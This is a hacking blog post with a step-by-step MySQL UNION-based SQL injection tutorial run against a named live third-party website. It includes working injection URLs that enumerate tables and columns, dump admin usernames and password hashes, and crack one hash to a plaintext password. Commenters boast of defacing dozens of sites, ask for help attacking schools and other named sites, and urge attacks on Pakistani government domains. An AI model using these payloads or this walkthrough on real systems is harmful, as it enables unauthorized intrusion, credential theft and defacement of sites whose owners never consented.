What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



  


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.


Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from 
 information_schema.tables where table_schema=database()--
Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()--
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).


Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.



So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms. 

Kindly mention your queries in comments. The same thing we did can be done easily using automated tools.I will write that in next post. But avoid tools,if you really want to learn new.

78 comments:

Post a Comment
  1. nice one

  2. Thanks for sharing this , it's good tutorial but i already known it,
    by it i have defaced almost 30 sites,
    thanks.

  3. this doesn't work with admin at last

  4. this doesn't work with last with only php not php?id=
    if possible with php plz let me know

  5. There must be something like ?anything= from where we could send our input. Search for this type of link in the website .
    Thanx salman, myk. Stay tuned.

  6. Amazing dude .......

  7. thanks very good post
    keep it up

  8. Thanks shabz and unethical bloggers. Stay connected and keep learning :)

  9. none of the link opened..

    doesn't work

  10. Sorry friend, the vulnerable website is under construction now. Obviously it was working when I wrote this article. Dont worry I would write one more like this.

  11. But how to get all column name for a perticular table name
    also page has a limit to show the no. of column so how to get the column name after the limit
    pls tell me about that

  12. the page has a capacity to show the column name so how to get all column name also
    how to get the column name for a perticular table name

  13. what about aspx?? does it work there??

  14. SQL injection works everywhere in php,asp,aspx or jsp if the user's input is not properly filtered. But the syntax of exploiting the vulnerability is different. This tutorial is only for php mysql injection.

    Sorry himanshu, I wonder , how I forgot to reply your query.

  15. Some tables show error while inserting the last query. While other tables work fine. What might be the problem?

  16. Very Interesting post. The special think about your post is that clear explanation with screenshot. Keep it up friend.

  17. @ahujaavi13

    You might face this problem rarely. It might be because of the user privileges.

    @Hacking Facebook
    Thanx a ton.

  18. whear is downloading link

  19. can you try to deface this website http://up.phinma.edu.ph/

  20. pls help me:( i want to deface the web site of our school...

  21. pls help me... order by doesnt work...

  22. its awesome....

  23. Nice Sharing Guys,
    Please share me with more sites with more examples .

  24. I m totally new to hacking.but with your articles i can take a better idea about how this works.Not only this article,i mean every article is very clear.So keep it up.
    All the best for writing more and more articles in future too.

  25. Thanks friends

  26. nice post keep it up we need more sturf here more sturf here

  27. nice one

  28. excellent i like it but some web sites have the .html as extension with out php? what can i do i dont know exactly please help me

  29. ahhh md5crack can no longer crack the password

  30. well xplnd artcle

  31. @aneesh :
    well explained bro !! :)
    @everyone :
    If u try to login in any indian website u may land in2 some legal issues so I request everyoneuse pakisthan website for all your experiments !!!

    try on diz
    pkmotors.com
    presidentofpakisthan.gov.pk
    and so on .... !!!

  32. lol

  33. Can u please provide me a tutorial on pkmotors.com, i am able to get the details of the tables and later steps i am failing, so please provide me a tutorial to my email: akulapvnkmr@gmail.com

  34. thanks for sharing,wonderful tutorial...!!!

  35. http://www.justdresses.co.uk check this one!

  36. yes its working and i had hacked some website too.

  37. good tutorial...
    i want to create my hackers team, and im looking for some people , who are interrested by it...if you want to do with me, send me and email, rolllings4@yahoo.fr

  38. Nice tutorial. It helped me doing it manually on some site.Instead using havij. Now i am cuurious how can use drop tabel insert en stuff like that with this tutorial. Can you explain that?

  39. How can you use insert en delete of drop table in this tutorial?

  40. can you give another vuln site that is working on this tutorials thanks so much i need it so badly...

  41. can you give me some vuln site that is working in this tutorials..? thanks so much i really madly need it

  42. em stukd after finding the sql version....... its >5 and i dont understand what to do now.... pleeeez help !!!

  43. em stukd after finding sql version... its > 5 and now i dont understand what to do.... please help !!!

  44. Nice tut, after reading it i can do it with my eyes closed but im struggling to update databases, I know im doing some thing wrong here, pls help with this statement.I think im trying to do an update in the middle of the websites select statement and i also dont think that the union should be there :
    http://www.site.co/index.php?cat=-50 union select all group_concat(cat_id,cat_name),2 from category ; update category set cat_name = 'test' where cat_id=1--

  45. I can reach to the column stage but I just can't fetch the data from the columns /:, its set up like this site.net/main.php?id=-2 union all select 1,password,3,4 from owners-- but i keep getting this error "Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/mobil0/public_html/cwm/neff/main.php on line 45" any tips?

  46. what exactly can you do then and how hard is it to do

  47. http://www.domexinfo.in/news.php?id=66' It show mysql warning .But doesn't reveals any tables or columns info.@Aneesh M. Makker wht's wrng with it?


    And for some websites "'" is not applicable http://www.eastbengaltherealpower.com/east-bengal-football-club-cherished-moments/id/130'

    http://bdnews7.com/bangladeshnews/?p=361'

  48. i'm building a website in jsp[sql injection],in login page i've use two fields loginuser and password,where only the valid user can logon,but now the problem is not able to logon when i type '' instead of valid user in loginuser field and 'or'= in password,plz help
    my email is:amitjoshi940@gmail.com

  49. i would like to know, the way of defacing it, its just you can access the tables :(

  50. hey bro admin i m a fan of hacking and you are a real hacker dude.............

  51. What if we want to see columns of specific tables?

  52. what to do whev server version is less than 5 but more than 4

  53. -52 union select all 1,group_concat(user_name,0x3a,password),3,4,5,6+from+user--



    it gives the vulnerable column 3 instead of username and password..
    wat is the problem ?

  54. what the fuck,,your the real hacker dude,,,,is your tools made on vb.net??or what??

  55. When i use the command : union select all 1,2,3,4..., appears Access Denied, what should i do?

  56. Before trying to hack any website, what are the must security or privacy issues(or whatever may be) i should consider to hide my identity or hack anonymously?

  57. heyy

  58. thz ya


    but last we find the pass and user that time,use .....1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--

    but that don't work full time,now use


    .....1,group_concat(username,0x3a,password),3,4,5,6 from login/* +from+information_schema.columns+where+table_schema=database()--

    check is!!!!!!!!!

  59. it's not working!

  60. is this only for .php sites ?????????

  61. where can i get the tools u are using ?

  62. ur method is write till version name... bt m not able to get table name from dis... http://www.olomouc.com/ubytovani/hotel.php?id=12 it is showing an mysql error... can u tell me.. wat might be the problem...????

  63. Hello all,I am new to this forum and I would like to ask that what are the benefits of sql training, what all topics should be covered and it is kinda bothering me ... and has anyone studies from this course wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
    would really appreciate help... and Also i would like to thank for all the information you are providing on sql.

  64. I am not a programmer but I have this SQL subject this session and have to prepare for it. What all topics should be covered in it?
    And has anyone studied from this course www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
    would really appreciate help

  65. how about this IP 200.11.212.107

  66. Try to hack www.coverxs.com if you can!!!

  67. what if, in website, "something = something" can't be found!!

  68. beatiful! I did a self tut and was able to follow your instruction... am on my way to my first ever deface... hahaha

  69. If In url id is not there then how we do

  70. As part of assignment I am doing sql injection in jsp ,
    now when I write that "order by" query to select where I am getting error
    it is not responding at all

    here is my code of jsp file
    try
    {
    Class.forName("com.mysql.jdbc.Driver");
    con = DriverManager.getConnection (dbUrl,"root","toor");
    stmt = con.createStatement();

    String query="select username,salary,account_no from data where account_no='"+account_id+"' ";
    rs = stmt.executeQuery(query);

    while ( rs.next() )
    {
    out1.println("your account information");
    out1.println(rs.getString(1));
    out1.println(rs.getString(2));
    out1.println(rs.getString(3));
    }
    }

    I can successfully replace account id with 'or'1 it works and I filtered that also
    but when I try
    "http://localhost:8080/WebApplication6/display.jsp?search_box=10001%20order%20by%201--" it does not do anything what change i do in my code so can do sql injection in jsp?

  71. Hi,
    Actually in one website, They are executing 2 different sql statements by passing the given textbox input.
    These 2 different sql statements returns different sets of columns.
    How will u exploit or use "UNION ALL" statement in this scenario?????? plz help..??

  72. We can hack fb database with this technique??

  73. We can hack fb database with this technique???

  74. sql injection

  75. i found a website, taht is vunlerable but in union selest t saiys acces denied for ...

  76. Instead of (admin) i am seeking (id) please what should i do?

  77. wtf dis aint working for the given website!

  78. admin plz mail me names of some vulnerable sites....................i want to use them in my sql injection project............
    mail me on : silwon2012@gmail.com

Post a Comment